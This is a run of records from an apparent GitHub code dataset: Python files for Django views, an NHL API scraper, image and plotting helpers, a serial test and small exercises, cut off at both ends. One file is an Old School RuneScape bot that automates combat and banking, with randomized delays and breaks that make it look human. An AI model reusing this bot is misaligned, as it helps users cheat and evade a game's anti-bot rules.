)\n stdout, stderr = cmd.communicate()\n stdout = stdout.decode(\"ascii\")\n return stdout.split(\"\\t\", 1)[0]\n\n\nclass VersionsUpdater:\n UPDATERS = {\n \"git-resolve\": \"update_git\",\n \"pass\": \"update_pass_value\",\n }\n\n def __init__(self, versions_file, version_mapping_json):\n self.version_mapping = json.loads(version_mapping_json)\n self.versions_file = versions_file\n self.config = configparser.ConfigParser()\n self.config.read(self.versions_file)\n\n def __call__(self):\n for service, version in sorted(self.version_mapping.items()):\n if not version:\n # leave empty to keep 
current version\n continue\n self.update(service, version)\n\n with open(self.versions_file, \"w\") as f:\n self.config.write(f)\n # Remove the trailing newline, which pre-commit doesn't like:\n f.truncate(f.tell() - 1)\n\n def update(self, service, version):\n update_mode = self.config[service].get(\"update\", \"git-resolve\")\n update_mode = update_mode.split(\":\", 1)\n mode = update_mode[0]\n args = \"\".join(update_mode[1:])\n\n func = getattr(self, self.UPDATERS[mode])\n func(service, version, args)\n\n def update_git(self, service, version, extra_args):\n resolved = git_resolve(self.config.get(service, \"url\"), version)\n if not resolved:\n raise ValueError(\n \"%s: Could not resolve version %s.\" % (service, version)\n )\n log(\"%s: resolved version %s to: %s\", service, version, resolved)\n self.config.set(service, \"revision\", resolved)\n self.config.set(service, \"version\", version)\n\n def update_pass_value(self, service, version, extra_args):\n self.config[service][extra_args] = version\n\n\ndef log(msg, *args):\n print(msg % args)\n sys.stdout.flush()\n\n\ndef list_components(versions_file, verbose=False):\n config = configparser.ConfigParser()\n config.read(versions_file)\n components = sorted(config.sections())\n if verbose:\n result = []\n for component in components:\n c = dict(config.items(component))\n c[\"name\"] = component\n result.append(c)\n else:\n result = components\n\n print(json.dumps(result, sort_keys=True))\n\n\ndef set_versions(versions_file, version_mapping_json):\n vu = VersionsUpdater(versions_file, version_mapping_json)\n vu()\n\n\ndef main():\n parser = argparse.ArgumentParser()\n subparsers = parser.add_subparsers()\n\n p = subparsers.add_parser(\n \"list-components\",\n help=\"List available components where versions can be set\",\n )\n p.add_argument(\n \"-v\",\n \"--verbose\",\n action=\"store_true\",\n help=\"Return all options from versions.ini, not only component names\",\n )\n p.add_argument(\"versions_file\", help='Name of \"versions.ini\"')\n p.set_defaults(func=list_components)\n\n p = subparsers.add_parser(\"set-versions\", help=\"Update versions\")\n p.add_argument(\n \"versions_file\",\n help=\"Name of versions.ini. 
If exists it will be overwritten.\",\n )\n p.add_argument(\n \"version_mapping_json\", help=\"JSON: mapping of service: version\"\n )\n p.set_defaults(func=set_versions)\n\n args = parser.parse_args()\n func_args = dict(args._get_kwargs())\n del func_args[\"func\"]\n return args.func(**func_args)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"flyingcircusio/batou_ext","sub_path":"src/batou_ext/jenkins.py","file_name":"jenkins.py","file_ext":"py","file_size_in_byte":4162,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"73062533867","text":"# -*- coding: utf-8 -*-\nfrom django.contrib.auth import views\nfrom django.template.response import TemplateResponse\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.urlresolvers import reverse\n\nfrom .models import Event, Engineer, Phone, Step\nfrom .forms import EventForm\nfrom .forms import ACTIVE_CHOICES\n\n\ndef user_login(request):\n \"\"\"\n Login func\n \"\"\"\n if request.user.is_authenticated():\n return TemplateResponse(request, 'ams/already_logged.html')\n else:\n return views.login(request, template_name='ams/login.html')\n\n\ndef user_logout(request):\n \"\"\"\n Logout func\n \"\"\"\n if request.user.is_authenticated():\n return views.logout(request, next_page=reverse('ams:goodbye'))\n else:\n return TemplateResponse(request, 'ams/not_logged.html')\n\n\n@login_required(login_url='/ams/accounts/login/')\ndef default(request):\n \"\"\"\n Show default AMS page.\n \"\"\"\n if request.method == 'GET':\n form = EventForm(request.GET)\n\n choice = request.GET.get('choice')\n if (choice is None or len(choice) == 0 or\n choice not in [i[0].decode('utf-8') for i in ACTIVE_CHOICES]):\n\n choice = 'Открыто'\n\n try:\n displayed = int(request.GET.get('displayed'))\n except (ValueError, TypeError):\n displayed = 5\n\n if choice and displayed:\n event = (Event.objects.filter(state__title__contains=choice)\n .order_by('-publication_datetime')[0:displayed])\n count = len(Event.objects.filter(state__title__contains=choice))\n return TemplateResponse(request, 'ams/default_ams.html', locals())\n\n\n@login_required(login_url='/ams/accounts/login/')\ndef detail(request, id):\n \"\"\"\n Showing event details\n \"\"\"\n event = Event.objects.filter(id=id)\n step = Step.objects.filter(event=event)\n engineer = Engineer.objects.filter(event=event)\n return TemplateResponse(request, 'ams/detail_ams.html', locals())\n\n\n@login_required(login_url='/ams/accounts/login/')\ndef detail_engineer(request, id):\n \"\"\"\n Showing engineer details\n \"\"\"\n engineer = Engineer.objects.filter(id=id)\n phone = Phone.objects.filter(ams_engineer_related=engineer)\n return TemplateResponse(request, 'ams/detail_engineer_ams.html', locals())\n\n\n@login_required(login_url='/ams/accounts/login/')\ndef detail_step(request, id):\n \"\"\"\n Showing step details\n \"\"\"\n step = Step.objects.filter(id=id)\n engineer = Engineer.objects.filter(step=step)\n return TemplateResponse(request, 'ams/detail_step.html', locals())\n","repo_name":"cmltaWt0/django-ams","sub_path":"ams/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"92663312","text":"import datetime\n\nimport keyboard\n\n\nimport osrs\n\nminimum_eat_health = 35\nfood_to_eat = [7946, 379, 361]\nport = '56800'\nnmz_to_bank = [\n '2615,3111,0',\n '2613,3102,0',\n '2605,3097,0'\n]\n\n\ndef main():\n 
start_time = datetime.datetime.now() - datetime.timedelta(hours=1)\n script_start = datetime.datetime.now()\n while True:\n q = {\n 'interactingWith': True,\n 'skills': ['hitpoints'],\n 'inv': True,\n 'playerWorldPoint': True\n }\n data = osrs.server.query_game_data(q, port)\n if 'playerWorldPoint' in data and data['playerWorldPoint']['z'] < 3:\n script_start = osrs.game.break_manager(script_start, 30, 35, 320, 508, 'pass_71', False, port)\n print('Dead, re supplying.')\n osrs.clock.random_sleep(3, 3.1)\n bank_and_return()\n print('Starting new dream.')\n start_dream()\n elif 'skills' in data and \\\n 'hitpoints' in data['skills'] and \\\n data['skills']['hitpoints']['boostedLevel'] < minimum_eat_health and 'inv' in data:\n food = osrs.inv.are_items_in_inventory(data['inv'], food_to_eat)\n if not food:\n print('out of food')\n else:\n osrs.move.move_and_click(food[0], food[1], 4, 4)\n osrs.move.click_off_screen(300, 1000, 300, 1100, False)\n osrs.clock.random_sleep(1, 1.1)\n elif (datetime.datetime.now() - start_time).total_seconds() > 900 and 'inv' in data:\n print('Potting up.')\n super_combat = osrs.inv.are_items_in_inventory_v2(data['inv'], [12695, 12697, 12699, 12701])\n if not super_combat:\n print('out of super combats')\n else:\n osrs.move.move_and_click(super_combat['x'], super_combat['y'], 4, 4)\n osrs.move.click_off_screen(300, 1000, 300, 700, False)\n start_time = datetime.datetime.now()\n osrs.clock.random_sleep(0.5, 0.6)\n elif 'interactingWith' in data:\n print('In combat, no action needed.')\n osrs.clock.random_sleep(0.5, 0.6)\n\n\ndef bank_and_return():\n osrs.move.run_to_loc(nmz_to_bank, port)\n osrs.clock.random_sleep(0.5, 0.6)\n bank = osrs.server.get_game_object('2614,3094,0', '10356', port)\n osrs.move.move_and_click(bank['x'], bank['y'], 3, 3)\n osrs.bank.wait_for_bank_interface(port)\n osrs.clock.random_sleep(0.5, 0.6)\n osrs.bank.bank_dump_inv(port)\n bank_data = osrs.bank.get_bank_data(port)\n super_combat = osrs.inv.is_item_in_inventory_v2(bank_data, 12695)\n osrs.move.right_click_menu_select(super_combat, 2, port)\n osrs.clock.random_sleep(0.3, 0.4)\n monkfish = osrs.inv.is_item_in_inventory_v2(bank_data, 7946)\n osrs.move.move_and_click(monkfish['x'], monkfish['y'], 3, 3)\n osrs.clock.random_sleep(0.3, 0.4)\n keyboard.send('esc')\n osrs.clock.random_sleep(0.3, 0.4)\n osrs.move.run_to_loc(nmz_to_bank[::-1], port)\n osrs.clock.random_sleep(0.6, 0.7)\n\n\ndef start_dream():\n dom = osrs.server.get_npc_by_id('1120', port)\n osrs.move.move_and_click(dom['x'], dom['y'], 2, 2)\n while True:\n chat = osrs.server.get_chat_options(port)\n if chat:\n for i, option in enumerate(chat):\n if 'Customisable Rumble' in option:\n keyboard.send(str(i))\n break\n break\n osrs.clock.random_sleep(1, 1.1)\n keyboard.send('space')\n osrs.clock.random_sleep(1, 1.1)\n keyboard.send('1')\n osrs.clock.random_sleep(0.6, 0.7)\n pot = osrs.server.get_game_object('2605,3117,0', '26291', port)\n osrs.move.move_and_click(pot['x'], pot['y'], 1, 3)\n osrs.clock.random_sleep(0.5, 0.6)\n osrs.move.wait_until_stationary(port)\n osrs.clock.random_sleep(1, 1.1)\n while True:\n accept = osrs.server.get_widget('129,6', port)\n if accept:\n osrs.move.move_and_click(accept['x'], accept['y'], 6, 3)\n break\n while True:\n loc = osrs.server.get_world_location(port)\n if 'z' in loc and loc['z'] == 3:\n osrs.clock.random_sleep(1, 1.1)\n break\n loc = osrs.server.get_world_location(port)\n osrs.move.run_to_loc(['{},{},3'.format(loc['x'] - 5, loc['y'] + 14)], port) # for whatever reason, the world points are 
different in NMZ.\n\n\nmain()","repo_name":"glandon22/AutoOldSchool","sub_path":"combat/nmz_no_absorb.py","file_name":"nmz_no_absorb.py","file_ext":"py","file_size_in_byte":4378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}{"seq_id":"19526425837","text":"\"\"\"\nMultiple Scrapers from the Hockey Data API\n==========================================\n\nWebsite for API documentation\nhttps://gitlab.com/dword4/nhlapi\n\nStructure:\nScrapers - Team Info, Roster Info,\n\nInsert SQLite - Team Info,\n\"\"\"\n\nimport pandas as pd\nimport requests\nimport json\nimport pprint\nimport sqlite3\nfrom pandas.io.json import json_normalize\n\nconn = sqlite3.connect('/Users/Ghodgson/Databases/nhl_data.db')\nc = conn.cursor()\n\ndef get_team_info():\n # Connect to the website and pretty print the json in a readable format\n URL = 'https://statsapi.web.nhl.com/api/v1/teams/{}'\n #r = requests.get(URL)\n #data = r.json()\n #pprint.pprint(data)\n # Loop that collects data for all teams that are both active and inactive\n\n all_team_frames = []\n for i in range(1,55):\n r = requests.get(URL.format(i))\n df = r.json()\n team_df = json_normalize(df['teams'])\n team_name = team_df.iloc[0]['name'].encode('ascii', 'ignore')\n print(\"Processing.........{}\".format(team_name))\n all_team_frames.append(team_df)\n\n team_concat = pd.concat(all_team_frames, ignore_index=True)\n team_concat.head()\n team_concat.info()\n\n team_concat.columns = team_concat.columns.str.replace('.', '_')\n team_final = team_concat.values.tolist()\n return team_final\n\n\n\ndef get_current_roster_info():\n # Select team IDs of all current teams\n c.execute(\"SELECT id FROM nhl_team_info_all WHERE active = 1\")\n a = c.fetchall()\n output = [i[0] for i in a]\n\n # Connect to the website and pretty print the json in a readable format\n URL = 'https://statsapi.web.nhl.com/api/v1/teams/4/?expand=team.roster'\n r = requests.get(URL)\n data = r.json()\n pprint.pprint(data)\n #team_df = json_normalize(data['teams'])\n roster_team_df = data['teams']\n\n current_roster = roster_team_df[0]['roster']['roster']\n len(current_roster)\n for i in range(0, len(current_roster)):\n print(current_roster[i])\n\n\n\n\n\n\"\"\"\nFunctions for inserting data into SQLite database\n\"\"\"\n\ndef insert_team_info(team_final):\n conn = sqlite3.connect('/Users/Ghodgson/Databases/nhl_data.db')\n c = conn.cursor()\n for item in team_final:\n c.execute('''insert into nhl_team_info_all values (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)''', item)\n # Lots of time was wasted here, conn.commit() finally pushed the data into the database.\n conn.commit()\n\n c.execute(\"SELECT * FROM nhl_team_info_all\")\n c.fetchall()\n\n conn.close()\n print(\"Finished inserting team info.\")\n\n\n\n\n\n# Run Scrapers\nteam_final = get_team_info()\n\n\n\n# Run SQLite Insert Statements\ninsert_team_info(team_final)\n\n","repo_name":"Gregistrar/APIs","sub_path":"hockey_data/hockey_scraper.py","file_name":"hockey_scraper.py","file_ext":"py","file_size_in_byte":2635,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}{"seq_id":"3837350441","text":"from django.contrib.auth.decorators import login_required\nfrom django.core.urlresolvers import reverse\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render_to_response\nfrom asesorias import models, forms\nfrom asesorias.vistas.vistasAdministradorPrincipal import \\\n checkAdministradorPrincipal\nfrom asesorias.utils import vistasPDF\n\n# 
Checks whether a centro exists and, if so, returns it.\ndef obtenerCentro(centro):\n try:\n # Fetch the centro whose name is centro.\n resultado = models.Centro.objects.get(nombre_centro=centro)\n except:\n resultado = False\n return resultado\n\n@checkAdministradorPrincipal\n@login_required\ndef addCentro(request):\n # The form has been submitted.\n if request.method == 'POST':\n # Get the values and validate them.\n form = forms.CentroForm(request.POST)\n if form.is_valid():\n # Save the form data to the system.\n form.save()\n # Redirect to the centro list page.\n return HttpResponseRedirect(reverse('listCentro',\n kwargs={'orden': 'nombre_centro'}))\n # If the form has not been filled in yet, generate a blank one.\n else:\n form = forms.CentroForm()\n\n return render_to_response('asesorias/Centro/addCentro.html',\n {'user': request.user, 'form': form})\n\n@checkAdministradorPrincipal\n@login_required\ndef editCentro(request, centro):\n # Get the centro instance.\n instancia_centro = obtenerCentro(centro)\n # If it exists, edit it.\n if instancia_centro:\n # Load the form for the existing centro.\n form = forms.CentroForm(instance=instancia_centro)\n # The original form has been modified.\n if request.method == 'POST':\n # Update the form with the new data.\n form = forms.CentroForm(request.POST,\n instance=instancia_centro)\n # If it is valid, save it.\n if form.is_valid():\n form.save()\n # Redirect to the centro list page.\n return HttpResponseRedirect(reverse('listCentro',\n kwargs={'orden': 'nombre_centro'}))\n # The centro does not exist.\n else:\n form = False\n return render_to_response('asesorias/Centro/editCentro.html',\n {'user': request.user, 'form': form})\n\n@checkAdministradorPrincipal\n@login_required\ndef delCentro(request, centro):\n # Get the centro instance.\n instancia_centro = obtenerCentro(centro)\n # If it exists, delete it.\n if instancia_centro:\n # Load the confirmation form.\n form = forms.RealizarConfirmacion()\n # The original form has been modified.\n if request.method == 'POST':\n form = forms.RealizarConfirmacion(request.POST)\n confirmacion = request.POST['confirmacion']\n\n if confirmacion == 'True':\n instancia_centro.borrar()\n\n # Redirect to the centro list page.\n return HttpResponseRedirect(reverse('listCentro',\n kwargs={'orden': 'nombre_centro'}))\n # The centro does not exist.\n else:\n form = True\n return render_to_response('asesorias/Centro/delCentro.html',\n {'user': request.user, 'form': form})\n\n@checkAdministradorPrincipal\n@login_required\ndef listCentro(request, orden):\n # Get a list of all centros.\n lista_centros = models.Centro.objects.order_by('nombre_centro')\n\n # A search has been submitted.\n if request.method == 'POST':\n # Get the values and validate them.\n form = forms.SearchForm(request.POST)\n # If it is valid, perform the search.\n if form.is_valid():\n busqueda = request.POST['busqueda']\n lista_centros = \\\n lista_centros.filter(nombre_centro__contains=busqueda)\n else:\n busqueda = False\n # No search was submitted.\n else:\n # Form for a possible search.\n form = forms.SearchForm()\n busqueda = False\n\n if orden == '_nombre_centro':\n lista_centros = lista_centros.reverse()\n\n return render_to_response('asesorias/Centro/listCentro.html',\n {'user': request.user, 'form': form,\n 'lista_centros': lista_centros, 'busqueda': busqueda,\n 'orden': 
orden})\n\n@checkAdministradorPrincipal\n@login_required\ndef generarPDFListaCentros(request, busqueda):\n lista_centros = models.Centro.objects.order_by('nombre_centro')\n\n # A search has been submitted.\n if busqueda != 'False':\n lista_centros = \\\n lista_centros.filter(nombre_centro__contains=busqueda)\n\n return vistasPDF.render_to_pdf('asesorias/plantilla_pdf.html',\n {'mylist': lista_centros, 'name': 'centros',})\n","repo_name":"bartsanchez/asesorias","sub_path":"Codigo/proyecto/asesorias/vistas/AdministradorPrincipal/vistasCentro.py","file_name":"vistasCentro.py","file_ext":"py","file_size_in_byte":4871,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}{"seq_id":"8060494424","text":"c = ca = 0\nl = []\nwhile True:\n c += 1\n n = input(f'Name of person #{c}: ').upper().split()[0]\n n1 = int(input(f\"How much does [{n}] weigh: \"))\n l.append([n, n1])\n ca += 1\n n2 = str(input('Continue? [Y/N]: ')).lower()[0]\n while n2 not in 'yn':\n n2 = str(input('Invalid option [Y/N]: ')).lower()[0]\n if n2 == 'n':\n break\nco = t = ms = mn = 0\nnome1 = nome2 = ''\nli = []\nfor r in l:\n li.append(r[0])\n if co == 0:\n mn = r[1]\n ms = r[1]\n nome1 = r[0]\n nome2 = r[0]\n else:\n if r[1] < mn:\n mn = r[1]\n nome1 = r[0]\n if r[1] > ms:\n ms = r[1]\n nome2 = r[0]\n co += 1\nprint(li)\nprint(f'In total you registered {ca} people.')\nprint(f'The highest weight was: {ms:.2f}Kg for {nome2} ')\nprint(f'The lowest weight entered was: {mn:.2f}Kg for {nome1}')\n","repo_name":"Rachidomar1523/pythonExercicios","sub_path":"lista peso+/maior menor peso.py","file_name":"maior menor peso.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}{"seq_id":"28696805305","text":"\"\"\"\r\nProgram name: image_get_green_1.py\r\nObjective: Separate the green only from a picture.\r\n\r\nKeywords: canvas, image, color adjust, jpg, PIL, Python Imaging Library\r\n============================================================================79\r\n \r\nExplanation: The \"split\" method separates the image into red, green and blue\r\nbands. The \"point(lambda i: i * intensity)\" method multiplies the color value\r\nfor each pixel in a band by an 'intensity' value and the\r\n\"merge(im_1.mode, new_source)\" method re-combines the resultant bands into \r\na new image.\r\n\r\nIn this example PIL and Tkinter are being used together.\r\nIf you use \"from Tkinter import *\", you seem to get namespace confusion:\r\nThe interpreter says \" im_1 = Image.open(\"/a_constr/pics1/redcar.jpg\")\r\nAttributeError: class Image has no attribute 'open' \",\r\nbut if you just say \" import Tkinter\" it seems OK.\r\nBut of course now you have to prefix all Tkinter methods with \" Tkinter. 
\"\r\n\r\nAuthor: Mike Ohlson de Fine\r\n\r\n\"\"\"\r\n#image_get_green_1.py\r\n#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\r\nimport ImageEnhance\r\nimport Image\r\n\r\nred_frac = 1.0\r\ngreen_frac = 1.0\r\nblue_frac = 1.0\r\n\r\nim_1 = Image.open(\"/a_constr/pics1/dusi_leo_1.jpg\")\r\n\r\n# split the image into individual bands\r\nsource = im_1.split()\r\nR, G, B = 0, 1, 2\r\n\r\n# Assign color intensity bands, zero for red and blue.\r\nred_band = source[R].point(lambda i: i * 0.0)\r\ngreen_band = source[G]\r\nblue_band = source[B].point(lambda i: i * 0.0)\r\nnew_source = [red_band, green_band, blue_band]\r\n\r\n# Merge (add) the three color bands\r\nim_2 = Image.merge(im_1.mode, new_source)\r\n\r\nim_2.show()\r\n#================================================================\r\n\r\n","repo_name":"anyatran/school","sub_path":"CG/SciPy/image_get_green_1.py","file_name":"image_get_green_1.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"13915362907","text":"r\"\"\"\n ____ ____ _ __ __ ____ ___\n | _ \\| _ \\ / \\ | \\/ |/ ___/ _ \\\n | | | | |_) | / _ \\ | |\\/| | | | | | |\n | |_| | _ < / ___ \\| | | | |__| |_| |\n |____/|_| \\_\\/_/ \\_\\_| |_|\\____\\___/\n research group\n dramco.be/\n\n KU Leuven - Technology Campus Gent,\n Gebroeders De Smetstraat 1,\n B-9000 Gent, Belgium\n\n File: LatexifyMatplotlib.py\n Created: 2019-01-10\n Author: Gilles Callebaut\n Description:\n\"\"\"\n\nfrom math import sqrt\nimport matplotlib as mpl\n\nmpl.use('pgf')\n\nSPINE_COLOR = 'gray'\n\n\ndef latexify(fig_width=None, fig_height=None, columns=1):\n \"\"\"Set up matplotlib's RC params for LaTeX plotting.\n Call this before plotting a figure.\n\n Parameters\n ----------\n fig_width : float, optional, inches\n fig_height : float, optional, inches\n columns : {1, 2}\n \"\"\"\n\n # code adapted from http://www.scipy.org/Cookbook/Matplotlib/LaTeX_Examples\n\n # Width and max height in inches for IEEE journals taken from\n # computer.org/cms/Computer.org/Journal%20templates/transactions_art_guide.pdf\n\n assert (columns in [1, 2])\n\n if fig_width is None:\n fig_width = 2.7 if columns == 1 else 6.9 # width in inches\n\n if fig_height is None:\n golden_mean = (sqrt(5) - 1.0) / 2.0 # Aesthetic ratio\n fig_height = fig_width * golden_mean # height in inches\n\n MAX_HEIGHT_INCHES = 8.0\n if fig_height > MAX_HEIGHT_INCHES:\n print(\"WARNING: fig_height too large:\" + fig_height +\n \"so will reduce to\" + MAX_HEIGHT_INCHES + \"inches.\")\n fig_height = MAX_HEIGHT_INCHES\n\n params = {\n 'backend': 'ps',\n 'axes.labelsize': 8,\n 'axes.titlesize': 8,\n 'legend.fontsize': 8,\n 'xtick.labelsize': 8,\n 'ytick.labelsize': 8,\n 'text.usetex': True,\n \"pgf.rcfonts\": False,\n \"pgf.texsystem\": \"lualatex\",\n 'figure.figsize': [fig_width, fig_height],\n 'font.family': 'serif',\n \"pgf.preamble\": [\n r\"\\usepackage[utf8x]{inputenc}\", # use utf8 fonts\n r\"\\usepackage[T1]{fontenc}\", # plots will be generated\n r\"\\usepackage[detect-all]{siunitx}\", # to use si units,\n r\"\\DeclareSIUnit{\\belmilliwatt}{Bm}\",\n r\"\\DeclareSIUnit{\\dBm}{\\deci\\belmilliwatt}\",\n r\"\\usepackage{booktabs}\",\n r\"\\renewcommand{\\arraystretch}{1.2}\"\n ]\n }\n\n mpl.rcParams.update(params)\n\n\ndef format_axes(ax):\n for spine in ['top', 'right']:\n ax.spines[spine].set_visible(False)\n\n for spine in ['left', 'bottom']:\n ax.spines[spine].set_color(SPINE_COLOR)\n ax.spines[spine].set_linewidth(0.5)\n\n 
ax.xaxis.set_ticks_position('bottom')\n ax.yaxis.set_ticks_position('left')\n\n for axis in [ax.xaxis, ax.yaxis]:\n axis.set_tick_params(direction='out', color=SPINE_COLOR)\n\n return ax\n\ndef legend(plt):\n plt.legend(framealpha=0.0)\n\ndef save(plt, filename):\n plt.savefig(filename, format=\"pdf\", dpi=1200,\n bbox_inches='tight')\n","repo_name":"DRAMCO/LoRaCoverageMeasurements","sub_path":"processing/LatexifyMatplotlib/LatexifyMatplotlib.py","file_name":"LatexifyMatplotlib.py","file_ext":"py","file_size_in_byte":3096,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"72801552428","text":"import serial\nimport time\nimport os\n\nport = \"/dev/serial0\"\ns = serial.Serial(port, 9600, timeout = 1)\n\ncmd = \"1\"\ns.write(cmd.encode(\"ascii\"))\n\npck = s.read(8)\nprint(pck.decode(\"ascii\"))\n\ns.close()\n\n","repo_name":"younghoeun/abt","sub_path":"python/cockpit.py","file_name":"cockpit.py","file_ext":"py","file_size_in_byte":198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11729221339","text":"\"\"\"\nEliahu Satat - 204395644\nDaniel Abergel - 315660712\n\"\"\"\nimport doctest\nimport numpy as np\nimport math\n\nclass Point():\n\n def __init__(self, point ,pulse = None ,gender = None):\n \"\"\"\n A constructor if its got one param (Point or string)\n used as copy constructor or string constructor\n if its got 3 param - regular constructor\n :param point: Point or string or int ( = temperature)\n :param pulse: int ( = pulse)\n :param gender: int ( = gender)\n checked!\n >>> p = Point(3, 2 ,-1)\n >>> p1 = Point(p)\n >>> print(p1 == p)\n True\n >>> p2 = Point(\"3 -1 2\")\n >>> print(p2 == p)\n True\n \"\"\"\n if(pulse == None): # if its got only one param\n if isinstance(point ,str): # if its line = string from file string constructor\n arr = point.split()\n self.temperature = float(arr[0])\n if (arr[1] == \"1\"):\n self.gender = int(arr[1])\n else:\n self.gender = -1\n self.pulse = float(arr[2])\n #self.weight = np.longdouble(1)\n self.weight = 1.0\n else: # if its point = copy constructor\n self.temperature = point.temperature\n self.gender = point.gender\n self.pulse = point.pulse\n #self.weight = np.longdouble(1)\n self.weight = 1.0\n\n else: # got temperature and pulse - and built the point\n self.temperature = point\n self.gender = gender\n self.pulse = pulse\n #self.weight = np.longdouble(1)\n self.weight = 1.0\n\n\n def distance(self , p):\n return math.sqrt((self.temperature - p.temperature)**2 + (self.pulse - p.pulse)**2)\n\n\n def __str__(self):\n return 'the point is : {} , {} , {} '.format(self.temperature , self.pulse , self.gender)\n\n def __eq__(self, other):\n return (self.temperature == other.temperature)and(self.gender == other.gender)and(self.pulse == other.pulse)and(self.weight == other.weight)\n\n\nif __name__ == '__main__':\n (failures, tests) = doctest.testmod(report=True)\n print(\"{} failures, {} tests\".format(failures, tests))\n\n","repo_name":"eliahusatat/Machine-Learning","sub_path":"Point.py","file_name":"Point.py","file_ext":"py","file_size_in_byte":2281,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"20855573504","text":"import pandas as pd\nimport json\nimport math\n\n\ndef truncate(data):\n import math\n\n result = sum(data) / 1000000000\n decimal = str(result).split(\".\")\n new = list(decimal[-1])\n new.insert(0, \".\")\n new = \"\".join(new)\n if float(new) > 
0.5:\n res = math.ceil(result)\n return int(res)\n else:\n return int(decimal[0])\n\n\ndef process_request(data, json_data):\n # input file location\n result = []\n d = {}\n for col in data.columns:\n d[col] = data[col].tolist()\n result.append(d)\n category_label = []\n for col in data.columns:\n if col != \"Series Label\":\n d = {\n \"name\": col,\n \"parentName\": \"CategoryAxis\",\n \"DisplayText\": \"\",\n \"offset\": {\"x\": \"\", \"y\": \"\"},\n \"labelDefaults\": [\n {\n \"rotation\": 0,\n \"offset\": {\"x\": \"\", \"y\": \"\"},\n \"fontColor\": \"\",\n \"color\": \"\",\n \"fontFamily\": \"\",\n \"fontSize\": \"\",\n \"bold\": False,\n }\n ],\n \"fontFamily\": \"\",\n \"fontSize\": \"\",\n \"fontColor\": \"\",\n \"rotation\": 0,\n \"bold\": False,\n }\n category_label.append(d)\n\n category_axis = {\n \"labelName\": \"CategoryAxis\",\n \"parentName\": \"Axis\",\n \"labelrows\": \"\",\n \"barGap\": \"\",\n \"name\": \"parent\",\n \"DisplayText\": \"\",\n \"labelDefaults\": {\n \"rotation\": 0,\n \"offset\": {\"x\": \"\", \"y\": \"\"},\n \"fontColor\": \"\",\n \"color\": \"\",\n \"fontFamily\": \"\",\n \"fontSize\": \"\",\n \"bold\": False,\n },\n \"fontColor\": \"\",\n \"color\": \"\",\n \"fontFamily\": \"\",\n \"fontSize\": \"\",\n \"bold\": False,\n \"visible\": True,\n \"categories\": \"Do Not Order\",\n \"series\": \"By Each Category\",\n \"titleLabel\": \"\",\n \"titleGap\": \"\",\n \"titleposition\": \"\",\n \"titleFont\": \"Arial\",\n \"titleSize\": 16,\n \"titleBold\": False,\n \"titleColor\": \"black\",\n \"categoryLabel\": category_label,\n }\n\n result_data = []\n\n data = data.sort_values(list(data.columns)[1], ascending=False)\n for col in data.columns:\n dt = {}\n if col != \"Series Label\":\n df = data.sort_values(col, ascending=False)\n options = [\"Other\", \"other\"]\n df1 = df.loc[df[\"Series Label\"].isin(options)]\n df = df.loc[~df[\"Series Label\"].isin(options)]\n df = df.append(df1, ignore_index=True)\n dt[col] = dict(zip(df[\"Series Label\"], df[col]))\n result_data.append(dt)\n\n javascript = []\n x_ = 0\n sum_category = {}\n for i in result_data:\n for cat, comp in i.items():\n sum_category[cat] = sum(comp.values())\n\n total = {}\n for cat, val in sum_category.items():\n total[cat] = truncate([val])\n\n summaryAxisLabel = []\n for ke, val in total.items():\n item = {\n \"name\": \"$\" + str(val) + \"b\",\n \"DisplayText\": \"\",\n \"decimalPlaceValue\": \"\",\n \"offset\": {\"x\": \"\", \"y\": \"\"},\n \"fontFamily\": \"\",\n \"fontSize\": \"\",\n \"fontColor\": \"\",\n \"rotation\": 0,\n \"bold\": False,\n }\n summaryAxisLabel.append(item)\n\n summary_axis = {\n \"labelDefaults\": {\n \"rotation\": 0,\n \"offset\": {\"x\": \"\", \"y\": \"\"},\n \"color\": \"\",\n \"fontFamily\": \"\",\n \"fontSize\": 10,\n \"bold\": False,\n },\n \"visible\": True,\n \"titleLabel\": \"\",\n \"titleGap\": \"\",\n \"titleposition\": \"\",\n \"titleFont\": \"\",\n \"titleSize\": \"\",\n \"titleBold\": False,\n \"titleColor\": \"\",\n \"decimalPlaceValue\": \"\",\n \"summayAxisLabel\": summaryAxisLabel,\n }\n\n value_axis = {\n \"name\": \"parent\",\n \"DisplayText\": \"\",\n \"majorStep\": \"\",\n \"min\": \"\",\n \"max\": \"\",\n \"majorTick\": \"\",\n \"fullspecifiedMajorticks\": [{\"value\": \"\", \"label\": True}],\n \"visible\": True,\n \"bold\": False,\n \"titleLabel\": \"\",\n \"titleGap\": \"\",\n \"titleposition\": \"\",\n \"titleFont\": \"\",\n \"titleSize\": \"\",\n \"titleBold\": False,\n \"titleColor\": \"green\",\n \"labels\": {\n \"labelFormat\": \"\",\n 
